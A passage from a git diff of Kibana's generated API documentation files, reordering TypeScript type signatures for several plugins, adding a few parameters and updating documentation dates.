\"getFields\"; subActionParams: Readonly<{} & {}>; }> | Readonly<{} & { subAction: \"getIncident\"; subActionParams: Readonly<{} & { externalId: string; }>; }> | Readonly<{} & { subAction: \"handshake\"; subActionParams: Readonly<{} & {}>; }> | Readonly<{} & { subAction: \"pushToService\"; subActionParams: Readonly<{} & { incident: Readonly<{} & { name: string; description: string | null; externalId: string | null; incidentTypes: number[] | null; severityCode: number | null; }>; comments: Readonly<{} & { comment: string; commentId: string; }>[] | null; }>; }> | Readonly<{} & { subAction: \"incidentTypes\"; subActionParams: Readonly<{} & {}>; }> | Readonly<{} & { subAction: \"severity\"; subActionParams: Readonly<{} & {}>; }>" + "Readonly<{} & { subAction: \"getFields\"; subActionParams: Readonly<{} & {}>; }> | Readonly<{} & { subAction: \"getIncident\"; subActionParams: Readonly<{} & { externalId: string; }>; }> | Readonly<{} & { subAction: \"handshake\"; subActionParams: Readonly<{} & {}>; }> | Readonly<{} & { subAction: \"pushToService\"; subActionParams: Readonly<{} & { incident: Readonly<{} & { description: string | null; name: string; externalId: string | null; incidentTypes: number[] | null; severityCode: number | null; }>; comments: Readonly<{} & { comment: string; commentId: string; }>[] | null; }>; }> | Readonly<{} & { subAction: \"incidentTypes\"; subActionParams: Readonly<{} & {}>; }> | Readonly<{} & { subAction: \"severity\"; subActionParams: Readonly<{} & {}>; }>" ], "path": "x-pack/plugins/actions/server/builtin_action_types/resilient/index.ts", "deprecated": false, @@ -1748,19 +1748,7 @@ "label": "ActionsClient", "description": [], "signature": [ - "{ execute: ({ actionId, params, source, relatedSavedObjects, }: Omit<", - "ExecuteOptions", - ", \"request\">) => Promise<", - { - "pluginId": "actions", - "scope": "common", - "docId": "kibActionsPluginApi", - "section": "def-common.ActionTypeExecutorResult", - "text": "ActionTypeExecutorResult" - }, - ">; create: ({ action: { actionTypeId, name, config, secrets }, }: ", - "CreateOptions", - ") => Promise<", + "{ get: ({ id }: { id: string; }) => Promise<", { "pluginId": "actions", "scope": "server", @@ -1770,7 +1758,9 @@ }, "<", "ActionTypeConfig", - ">>; get: ({ id }: { id: string; }) => Promise<", + ">>; delete: ({ id }: { id: string; }) => Promise<{}>; create: ({ action: { actionTypeId, name, config, secrets }, }: ", + "CreateOptions", + ") => Promise<", { "pluginId": "actions", "scope": "server", @@ -1792,7 +1782,17 @@ }, "<", "ActionTypeConfig", - ">>; delete: ({ id }: { id: string; }) => Promise<{}>; getAll: () => Promise<", + ">>; execute: ({ actionId, params, source, relatedSavedObjects, }: Omit<", + "ExecuteOptions", + ", \"request\">) => Promise<", + { + "pluginId": "actions", + "scope": "common", + "docId": "kibActionsPluginApi", + "section": "def-common.ActionTypeExecutorResult", + "text": "ActionTypeExecutorResult" + }, + ">; getAll: () => Promise<", { "pluginId": "actions", "scope": "server", @@ -1810,7 +1810,7 @@ }, "<", "ActionTypeConfig", - ">[]>; getOAuthAccessToken: ({ type, options }: Readonly<{} & { type: \"client\" | \"jwt\"; options: Readonly<{} & { config: Readonly<{} & { clientId: string; jwtKeyId: string; userIdentifierValue: string; }>; tokenUrl: string; secrets: Readonly<{ privateKeyPassword?: string | undefined; } & { clientSecret: string; privateKey: string; }>; }> | Readonly<{} & { scope: string; config: Readonly<{} & { clientId: string; tenantId: string; }>; tokenUrl: string; secrets: Readonly<{} & { clientSecret: string; }>; }>; }>, configurationUtilities: ", + ">[]>; getOAuthAccessToken: ({ type, options }: Readonly<{} & { options: Readonly<{} & { config: Readonly<{} & { clientId: string; jwtKeyId: string; userIdentifierValue: string; }>; tokenUrl: string; secrets: Readonly<{ privateKeyPassword?: string | undefined; } & { clientSecret: string; privateKey: string; }>; }> | Readonly<{} & { scope: string; config: Readonly<{} & { clientId: string; tenantId: string; }>; tokenUrl: string; secrets: Readonly<{} & { clientSecret: string; }>; }>; type: \"client\" | \"jwt\"; }>, configurationUtilities: ", "ActionsConfigurationUtilities", ") => Promise<{ accessToken: string | null; }>; enqueueExecution: (options: ", "ExecuteOptions", diff --git a/api_docs/actions.mdx b/api_docs/actions.mdx index b93b643e5cbcc..91d5459d66c06 100644 --- a/api_docs/actions.mdx +++ b/api_docs/actions.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/actions title: "actions" image: https://source.unsplash.com/400x175/?github description: API docs for the actions plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'actions'] --- import actionsObj from './actions.devdocs.json'; diff --git a/api_docs/advanced_settings.mdx b/api_docs/advanced_settings.mdx index f16942c36b58f..eab29bf01da57 100644 --- a/api_docs/advanced_settings.mdx +++ b/api_docs/advanced_settings.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/advancedSettings title: "advancedSettings" image: https://source.unsplash.com/400x175/?github description: API docs for the advancedSettings plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'advancedSettings'] --- import advancedSettingsObj from './advanced_settings.devdocs.json'; diff --git a/api_docs/aiops.mdx b/api_docs/aiops.mdx index 5061bd1c674ed..56197bdc37640 100644 --- a/api_docs/aiops.mdx +++ b/api_docs/aiops.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/aiops title: "aiops" image: https://source.unsplash.com/400x175/?github description: API docs for the aiops plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'aiops'] --- import aiopsObj from './aiops.devdocs.json'; diff --git a/api_docs/alerting.devdocs.json b/api_docs/alerting.devdocs.json index 37286b87f391e..a71cca2e3d278 100644 --- a/api_docs/alerting.devdocs.json +++ b/api_docs/alerting.devdocs.json @@ -43,7 +43,7 @@ "The rule to view" ], "signature": [ - "{ id: string; name: string; monitoring?: ", + "{ params: never; tags: string[]; id: string; monitoring?: ", { "pluginId": "alerting", "scope": "common", @@ -51,7 +51,7 @@ "section": "def-common.RuleMonitoring", "text": "RuleMonitoring" }, - " | undefined; tags: string[]; enabled: boolean; params: never; actions: ", + " | undefined; name: string; enabled: boolean; actions: ", { "pluginId": "alerting", "scope": "common", @@ -1732,7 +1732,7 @@ "section": "def-common.SanitizedRule", "text": "SanitizedRule" }, - ", \"name\" | \"tags\" | \"enabled\" | \"actions\" | \"throttle\" | \"consumer\" | \"schedule\" | \"createdBy\" | \"updatedBy\" | \"createdAt\" | \"updatedAt\" | \"notifyWhen\"> & { producer: string; ruleTypeId: string; ruleTypeName: string; }" + ", \"tags\" | \"name\" | \"enabled\" | \"actions\" | \"throttle\" | \"consumer\" | \"schedule\" | \"createdBy\" | \"updatedBy\" | \"createdAt\" | \"updatedAt\" | \"notifyWhen\"> & { producer: string; ruleTypeId: string; ruleTypeName: string; }" ], "path": "x-pack/plugins/alerting/server/types.ts", "deprecated": false @@ -1912,7 +1912,7 @@ "section": "def-server.PublicAlert", "text": "PublicAlert" }, - "; done: () => ", + "; hasReachedAlertLimit: () => boolean; done: () => ", "AlertFactoryDoneUtils", "; }" ], @@ -2396,7 +2396,7 @@ "label": "AlertingRulesConfig", "description": [], "signature": [ - "Pick[] | undefined; } & { actions: Readonly<{ connectorTypeOverrides?: Readonly<{ max?: number | undefined; } & { id: string; }>[] | undefined; } & { max: number; }>; }>; minimumScheduleInterval: Readonly<{} & { value: string; enforce: boolean; }>; }>, \"minimumScheduleInterval\"> & { isUsingSecurity: boolean; }" + "Pick[] | undefined; } & { actions: Readonly<{ connectorTypeOverrides?: Readonly<{ max?: number | undefined; } & { id: string; }>[] | undefined; } & { max: number; }>; alerts: Readonly<{} & { max: number; }>; }>; minimumScheduleInterval: Readonly<{} & { value: string; enforce: boolean; }>; }>, \"minimumScheduleInterval\"> & { isUsingSecurity: boolean; }" ], "path": "x-pack/plugins/alerting/server/config.ts", "deprecated": false, @@ -2569,7 +2569,25 @@ "label": "RulesClient", "description": [], "signature": [ - "{ aggregate: ({ options: { fields, filter, ...options }, }?: { options?: ", + "{ get: ({ id, includeLegacyId, includeSnoozeData, excludeFromPublicApi, }: { id: string; includeLegacyId?: boolean | undefined; includeSnoozeData?: boolean | undefined; excludeFromPublicApi?: boolean | undefined; }) => Promise<", + { + "pluginId": "alerting", + "scope": "common", + "docId": "kibAlertingPluginApi", + "section": "def-common.SanitizedRule", + "text": "SanitizedRule" + }, + " | ", + "SanitizedRuleWithLegacyId", + ">; delete: ({ id }: { id: string; }) => Promise<{}>; aggregate: ({ options: { fields, filter, ...options }, }?: { options?: ", "AggregateOptions", " | undefined; }) => Promise<", "AggregateResult", @@ -2609,24 +2627,6 @@ "section": "def-server.FindResult", "text": "FindResult" }, - ">; get: ({ id, includeLegacyId, includeSnoozeData, excludeFromPublicApi, }: { id: string; includeLegacyId?: boolean | undefined; includeSnoozeData?: boolean | undefined; excludeFromPublicApi?: boolean | undefined; }) => Promise<", - { - "pluginId": "alerting", - "scope": "common", - "docId": "kibAlertingPluginApi", - "section": "def-common.SanitizedRule", - "text": "SanitizedRule" - }, - " | ", - "SanitizedRuleWithLegacyId", ">; update: >; delete: ({ id }: { id: string; }) => Promise<{}>; resolve: >; resolve: , \"name\" | \"tags\" | \"enabled\" | \"actions\" | \"throttle\" | \"consumer\" | \"schedule\" | \"createdBy\" | \"updatedBy\" | \"createdAt\" | \"updatedAt\" | \"notifyWhen\"> & { producer: string; ruleTypeId: string; ruleTypeName: string; }" + ", \"tags\" | \"name\" | \"enabled\" | \"actions\" | \"throttle\" | \"consumer\" | \"schedule\" | \"createdBy\" | \"updatedBy\" | \"createdAt\" | \"updatedAt\" | \"notifyWhen\"> & { producer: string; ruleTypeId: string; ruleTypeName: string; }" ], "path": "x-pack/plugins/alerting/common/rule.ts", "deprecated": false, diff --git a/api_docs/alerting.mdx b/api_docs/alerting.mdx index d69bdafe73253..395e0c140beba 100644 --- a/api_docs/alerting.mdx +++ b/api_docs/alerting.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/alerting title: "alerting" image: https://source.unsplash.com/400x175/?github description: API docs for the alerting plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'alerting'] --- import alertingObj from './alerting.devdocs.json'; diff --git a/api_docs/apm.mdx b/api_docs/apm.mdx index fdd21d0dcfdfb..9b8b97f4e1acd 100644 --- a/api_docs/apm.mdx +++ b/api_docs/apm.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/apm title: "apm" image: https://source.unsplash.com/400x175/?github description: API docs for the apm plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'apm'] --- import apmObj from './apm.devdocs.json'; diff --git a/api_docs/banners.mdx b/api_docs/banners.mdx index c9eb19f741964..c0c2246c4eb76 100644 --- a/api_docs/banners.mdx +++ b/api_docs/banners.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/banners title: "banners" image: https://source.unsplash.com/400x175/?github description: API docs for the banners plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'banners'] --- import bannersObj from './banners.devdocs.json'; diff --git a/api_docs/bfetch.devdocs.json b/api_docs/bfetch.devdocs.json index a237342580ae8..fb3b44c609fd3 100644 --- a/api_docs/bfetch.devdocs.json +++ b/api_docs/bfetch.devdocs.json @@ -338,7 +338,15 @@ "signature": [ "(path: string, params: (request: ", "KibanaRequest", - ") => ", + ", context: ", + { + "pluginId": "core", + "scope": "server", + "docId": "kibCorePluginApi", + "section": "def-server.RequestHandlerContext", + "text": "RequestHandlerContext" + }, + ") => ", { "pluginId": "bfetch", "scope": "common", @@ -346,7 +354,17 @@ "section": "def-common.StreamingResponseHandler", "text": "StreamingResponseHandler" }, - ") => void" + ", method?: \"GET\" | \"POST\" | \"PUT\" | \"DELETE\" | undefined, pluginRouter?: ", + "IRouter", + "<", + { + "pluginId": "core", + "scope": "server", + "docId": "kibCorePluginApi", + "section": "def-server.RequestHandlerContext", + "text": "RequestHandlerContext" + }, + "> | undefined) => void" ], "path": "src/plugins/bfetch/server/plugin.ts", "deprecated": false, @@ -375,7 +393,15 @@ "signature": [ "(request: ", "KibanaRequest", - ") => ", + ", context: ", + { + "pluginId": "core", + "scope": "server", + "docId": "kibCorePluginApi", + "section": "def-server.RequestHandlerContext", + "text": "RequestHandlerContext" + }, + ") => ", { "pluginId": "bfetch", "scope": "common", @@ -388,6 +414,43 @@ "path": "src/plugins/bfetch/server/plugin.ts", "deprecated": false, "isRequired": true + }, + { + "parentPluginId": "bfetch", + "id": "def-server.BfetchServerSetup.addStreamingResponseRoute.$3", + "type": "CompoundType", + "tags": [], + "label": "method", + "description": [], + "signature": [ + "\"GET\" | \"POST\" | \"PUT\" | \"DELETE\" | undefined" + ], + "path": "src/plugins/bfetch/server/plugin.ts", + "deprecated": false, + "isRequired": false + }, + { + "parentPluginId": "bfetch", + "id": "def-server.BfetchServerSetup.addStreamingResponseRoute.$4", + "type": "Object", + "tags": [], + "label": "pluginRouter", + "description": [], + "signature": [ + "IRouter", + "<", + { + "pluginId": "core", + "scope": "server", + "docId": "kibCorePluginApi", + "section": "def-server.RequestHandlerContext", + "text": "RequestHandlerContext" + }, + "> | undefined" + ], + "path": "src/plugins/bfetch/server/plugin.ts", + "deprecated": false, + "isRequired": false } ], "returnComment": [] diff --git a/api_docs/bfetch.mdx b/api_docs/bfetch.mdx index d086f3856107b..dd05defadd370 100644 --- a/api_docs/bfetch.mdx +++ b/api_docs/bfetch.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/bfetch title: "bfetch" image: https://source.unsplash.com/400x175/?github description: API docs for the bfetch plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'bfetch'] --- import bfetchObj from './bfetch.devdocs.json'; @@ -21,7 +21,7 @@ Contact [App Services](https://github.com/orgs/elastic/teams/kibana-app-services | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 78 | 1 | 69 | 2 | +| 80 | 1 | 71 | 2 | ## Client diff --git a/api_docs/canvas.mdx b/api_docs/canvas.mdx index cd388ad778381..84d0ab053f01a 100644 --- a/api_docs/canvas.mdx +++ b/api_docs/canvas.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/canvas title: "canvas" image: https://source.unsplash.com/400x175/?github description: API docs for the canvas plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'canvas'] --- import canvasObj from './canvas.devdocs.json'; diff --git a/api_docs/cases.mdx b/api_docs/cases.mdx index d5c62b53726b0..8c8fc918c9b18 100644 --- a/api_docs/cases.mdx +++ b/api_docs/cases.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/cases title: "cases" image: https://source.unsplash.com/400x175/?github description: API docs for the cases plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'cases'] --- import casesObj from './cases.devdocs.json'; diff --git a/api_docs/charts.mdx b/api_docs/charts.mdx index bfa9dfe5d995d..879d3fd2ce32a 100644 --- a/api_docs/charts.mdx +++ b/api_docs/charts.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/charts title: "charts" image: https://source.unsplash.com/400x175/?github description: API docs for the charts plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'charts'] --- import chartsObj from './charts.devdocs.json'; diff --git a/api_docs/cloud.mdx b/api_docs/cloud.mdx index 9e12ef3d4b2dd..b19cbe910b3f7 100644 --- a/api_docs/cloud.mdx +++ b/api_docs/cloud.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/cloud title: "cloud" image: https://source.unsplash.com/400x175/?github description: API docs for the cloud plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'cloud'] --- import cloudObj from './cloud.devdocs.json'; diff --git a/api_docs/cloud_security_posture.mdx b/api_docs/cloud_security_posture.mdx index a00eac130bb5e..6d2856179de5c 100644 --- a/api_docs/cloud_security_posture.mdx +++ b/api_docs/cloud_security_posture.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/cloudSecurityPosture title: "cloudSecurityPosture" image: https://source.unsplash.com/400x175/?github description: API docs for the cloudSecurityPosture plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'cloudSecurityPosture'] --- import cloudSecurityPostureObj from './cloud_security_posture.devdocs.json'; diff --git a/api_docs/console.mdx b/api_docs/console.mdx index 9c89ffa115dcf..37339139f936f 100644 --- a/api_docs/console.mdx +++ b/api_docs/console.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/console title: "console" image: https://source.unsplash.com/400x175/?github description: API docs for the console plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'console'] --- import consoleObj from './console.devdocs.json'; diff --git a/api_docs/controls.mdx b/api_docs/controls.mdx index fd6ed74379357..97c69c1387e57 100644 --- a/api_docs/controls.mdx +++ b/api_docs/controls.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/controls title: "controls" image: https://source.unsplash.com/400x175/?github description: API docs for the controls plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'controls'] --- import controlsObj from './controls.devdocs.json'; diff --git a/api_docs/core.devdocs.json b/api_docs/core.devdocs.json index caa8db405aef7..a4b351471464c 100644 --- a/api_docs/core.devdocs.json +++ b/api_docs/core.devdocs.json @@ -2530,12 +2530,12 @@ "id": "def-public.HttpFetchQuery.Unnamed", "type": "IndexSignature", "tags": [], - "label": "[key: string]: string | number | boolean | number[] | string[] | boolean[] | null | undefined", + "label": "[key: string]: string | number | boolean | string[] | number[] | boolean[] | null | undefined", "description": [ "\nTypeScript note: Technically we should use this interface instead, but @types/node uses the below stricter\ndefinition, so to avoid TypeScript errors, we'll restrict our version.\n\n[key: string]:\n | string\n | number\n | boolean\n | Array\n | undefined\n | null;" ], "signature": [ - "[key: string]: string | number | boolean | number[] | string[] | boolean[] | null | undefined" + "[key: string]: string | number | boolean | string[] | number[] | boolean[] | null | undefined" ], "path": "node_modules/@types/kbn__core-http-browser/index.d.ts", "deprecated": false @@ -5399,7 +5399,7 @@ "label": "size", "description": [], "signature": [ - "\"s\" | \"m\" | \"l\" | undefined" + "\"m\" | \"s\" | \"l\" | undefined" ], "path": "node_modules/@types/kbn__core-overlays-browser/index.d.ts", "deprecated": false @@ -9428,7 +9428,7 @@ "array of permitted values for this setting" ], "signature": [ - "number[] | string[] | undefined" + "string[] | number[] | undefined" ], "path": "node_modules/@types/kbn__core-ui-settings-common/index.d.ts", "deprecated": false @@ -9954,9 +9954,9 @@ "\nA sub-set of {@link UiSettingsParams} exposed to the client-side." ], "signature": [ - "{ metric?: { type: string; name: string; } | undefined; type?: ", + "{ options?: string[] | number[] | undefined; type?: ", "UiSettingsType", - " | undefined; name?: string | undefined; order?: number | undefined; value?: unknown; description?: string | undefined; options?: number[] | string[] | undefined; category?: string[] | undefined; optionLabels?: Record | undefined; requiresPageReload?: boolean | undefined; readonly?: boolean | undefined; sensitive?: boolean | undefined; deprecation?: ", + " | undefined; metric?: { type: string; name: string; } | undefined; value?: unknown; description?: string | undefined; name?: string | undefined; order?: number | undefined; category?: string[] | undefined; optionLabels?: Record | undefined; requiresPageReload?: boolean | undefined; readonly?: boolean | undefined; sensitive?: boolean | undefined; deprecation?: ", "DeprecationSettings", " | undefined; }" ], @@ -10025,9 +10025,9 @@ "label": "SavedObjectsFindOptions", "description": [], "signature": [ - "{ type: string | string[]; filter?: any; search?: string | undefined; page?: number | undefined; aggs?: Record | undefined; fields?: string[] | undefined; perPage?: number | undefined; sortField?: string | undefined; searchFields?: string[] | undefined; hasReference?: ", + "> | undefined; fields?: string[] | undefined; page?: number | undefined; perPage?: number | undefined; sortField?: string | undefined; searchFields?: string[] | undefined; hasReference?: ", "SavedObjectsFindOptionsReference", " | ", "SavedObjectsFindOptionsReference", @@ -10123,7 +10123,7 @@ "signature": [ "Pick<", "Toast", - ", \"children\" | \"color\" | \"className\" | \"lang\" | \"style\" | \"role\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"data-test-subj\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\"> & { title?: string | ", + ", \"children\" | \"onError\" | \"hidden\" | \"color\" | \"className\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"style\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"role\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" 